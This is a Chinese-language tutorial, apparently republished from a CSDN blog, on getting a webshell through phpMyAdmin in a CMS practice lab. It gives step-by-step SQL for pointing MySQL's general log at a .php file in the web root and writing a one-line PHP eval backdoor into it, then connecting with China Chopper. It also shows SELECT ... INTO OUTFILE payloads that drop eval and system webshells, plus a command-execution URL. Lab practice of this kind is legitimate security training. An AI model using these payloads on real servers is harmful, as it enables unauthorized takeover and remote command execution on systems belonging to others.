欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 教育 > 锐评 > phpMyAdmin之CMS靶场

phpMyAdmin之CMS靶场

2024/11/30 9:52:39 来源:https://blog.csdn.net/weixin_57240513/article/details/140890387  浏览:    关键词:phpMyAdmin之CMS靶场

方法一:通过日志文件拿webshell

常用的语句如下:

show global variables like '%general%';
set global general_log='on'; 
set global general_log_file = 'D:/phpStudy_pro/WWW/muma.php';
show global variables like '%general%';
select '<?php eval($_POST["admin"]);?>';
select+'<?php+phpinfo();+?>'
select+'<?php+//%0Aphpinfo();+?>'

查看日志目录路径

show global variables like '%general%';

image-20240803135315379

打开日志功能

set global general_log='on'; 

image-20240803135432742

设置日志文件目录,创建php日志文件

set global general_log_file='D:/phpStudy_pro/WWW/muma.php';

image-20240803140146668

查看自己创建的日志文件

show global variables like '%general%';

image-20240803140254886

往日志文件里写一句话木马

select '<?php eval($_POST["admin"]);?>';

image-20240803140655508

使用中国菜刀工具连接自己创建的php文件。

image-20240803140453565

链接到了服务器的目录

image-20240803140612235

懒人方法:也可以直接全部运行

show global variables like '%general%';
set global general_log='on'; 
set global general_log_file = 'D:/phpStudy_pro/WWW/muma.php';
show global variables like '%general%';
select '<?php eval($_POST["admin"]);?>';

image-20240803141331337

方法二:上传日志文件拿shell

常用语句

1.⾸先判断mysql位置
select @@datadir
路径:C:\phpStudy\MySQL\data\
2.猜测web路径
猜测web路径:C:\phpStudy\www
C:\phpStudy\WWW\web.php
3.写webshell
select "<?php eval($_POST[a]);?>" into outfile 'c:/phpstudy/www/b.php';
select "<?php system($_GET[a]);?>" into outfile 'c:/phpstudy/PHPTutorial/w
ww/d.php';
4.浏览器
http://192.168.2.8/d.php?a=dir ..\
select "<?php phpinfo();eval($_POST[a]);?>" into outfile 'C:\phpStudy\WWW
\web.php';
备注:/
不要⽤\,如⾥要⽤\\(转义)

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com